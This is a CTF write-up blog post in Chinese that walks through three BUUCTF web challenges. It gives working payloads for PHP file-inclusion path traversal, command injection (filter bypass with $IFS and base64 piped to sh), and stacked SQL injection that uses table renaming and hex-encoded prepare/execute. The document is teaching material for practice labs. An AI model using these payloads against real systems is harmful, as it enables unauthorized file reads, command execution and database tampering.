【Web】buuctf write up day 1

[HCTF 2018]WarmUp

keywords:php,代码审计
打开只有一张图
在这里插入图片描述

代码检查

  1. 检查代码,发现注释,有个source.php文件,访问它
    在这里插入图片描述
    得到如下代码
    在这里插入图片描述
    在这里插入图片描述
    需要代码审计,粗略看了下,从CheckFile等几个字眼知道,大概是要检查是否有文件、或者是否包含关键字。按照提示,先访问hint.php.。
    在这里插入图片描述
    得到这个页面,提示flag在ffffllllaaaagggg,搞清楚这个ffffllllaaaagggg是变量还是什么文件

代码分析

类emmm分析

part 1:

class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            
  1. 传参source.php(如上面代码)和hint.php
    在这里插入图片描述
    需要include ffffllllaaaagggg。

  2. 若_page的值在数组$whitelist中,则返回true。

  3. mb_substr(string $str , int $start , int $length)----
    按照位置截断字符串。

  4. mb_strpos(haystack, needle)----
    查找字符串needle在另一个字符串haystack中首次出现的位置,返回位置(int)

  5. 整体逻辑:将page字符串第一个问号?以前的字符串截下来,保存在$_page中,若_page值为source.php、hint.php则返回true

part 2:

			$_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

_page变量作出如下变化:一次url解码,一次问号截断
注意:url传入服务器会自动进行一次urldecode。?的url编码为%3F,双重url编码为%253F

让函数checkFile返回true

以下三种构造方式均可让emmm::checkFile($_REQUEST[‘file’])返回true:
(1)满足直接传递参数if语句:file=source.php
(2)满足问号截断if语句:file=source.php?xxxxxxxxx
(3)满足url编码后问号截断的if语句:file=source.php%253Fxxxxxxx
.
注:source.php可换成hint.php。

构造payload
 ?file=source.php?/../../../../ffffllllaaaagggg
  ?file=source.php%253F/../../../../ffffllllaaaagggg

原理:
(1)要满足emmm::checkFile($_REQUEST[‘file’])返回true
(2)要include找到文件ffffllllaaaagggg
(3)目录穿越次数暂时不知道?—

疑惑解释

疑惑:source.php?/ 不是文件目录为何能找到ffffllllaaaagggg?
解释:include会将source.php?/看做是一个目录,即使它不存在,只要通过几个 …/ 返回上级目录即可。比如 file=source.php?/aaa/bbb/ccc/../../../../../../../ffffllllaaaagggg 依然可行

正文代码

if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  

满足3个条件,文件被包含:
1.存在文件
2.为字符串
3.emmm::checkFile($_REQUEST[‘file’])返回true

在这里插入图片描述

[GXYCTF2019]Ping Ping Ping

keywords: RCE
在这里插入图片描述
cnm
在这里插入图片描述
过滤了空格
思路:
在这里插入图片描述
用两次url编码尝试

...|cat%2520flag

在这里插入图片描述
过滤了字符串flag
思路:

  1. 编码绕过关键词
  2. 变量拼接绕过关键字

(后来试了下,两次url编码不太方便后续命令,还是用用$IFS$数字比较好)
尝试base64编码

cat$IFS$9flag.php
Y2F0JElGUyQ5ZmxhZy5waHA=

payload:
?ip=1;echo$IFS$9Y2F0JElGUyQ5ZmxhZy5waHA=|base64$IFS$9-d|sh

发现flag在代码里面
在这里插入图片描述

第二种方法:变量拼接
构造payload:

?ip=1;a=fl;b=ag;cat$IFS$9$a$b.php    //fxck ur flag
?ip=1;b=ag;cat$IFS$9fl$b.php             //成功

[强网杯 2019]随便注

在这里插入图片描述

  1. 随便注入, 爆字段数量
1' order by 1;
1' order by 2;
1' order by 3;

在这里插入图片描述
在这里插入图片描述
2. 爆库
在这里插入图片描述
过滤了select
使用堆叠注入

1' ; show database();

在这里插入图片描述
有回显

  1. 爆表
    在这里插入图片描述
  2. 爆字段
1' ; show columns from words;

在这里插入图片描述
没找到什么flag,看看另一个表(没看到东西)
表名为数字时,要用反引号包起来查询

抄大佬作业:
由show的作用可知,words表内就两个字段,一个叫id,一个叫data
并且可以得知,该题作者在页面就查了这两个字段的内容,由于该题禁用select,因此我们可以用作者原本设定的查表函数来帮我们查我们想要查找的内容。因此我们对表进行改名:
用rename把words表改名为其他的表名,把 1919810931114514表的名字改为words,给words表添加新的列名id,将flag改名为data。

1' ;rename table `1919810931114514` to words;alter table words add id int unsigned not Null auto_increment primary key; alter table words change flag data varchar(100);

在这里插入图片描述
这里补充一下alter的用法:

//alter可以修改已知表的列
alter table "table_name" add "column_name" type;//添加一个列
alter table "table_name" drop "column_name" type;//删除一个列
alter table "table_name" alter column "column_name" type;//改变列的数据类型
alter table "table_name" change "column1" "column2" type;//改列名
alter table "table_name" rename "column1" to "column2";//改列名

解法2:
由于select被过滤了,因此将select * from ` 1919810931114514``进行十六进制编码,再构造payload。

;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

知识点:

  1. prepare…from…是预处理语句,会进行编码转换
  2. execute用来执行由SQLPrepare创建的SQL语句。
  3. SELECT可以在一条语句里对多个变量同时赋值,而SET只能一次对一个变量赋值。
  • 16
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值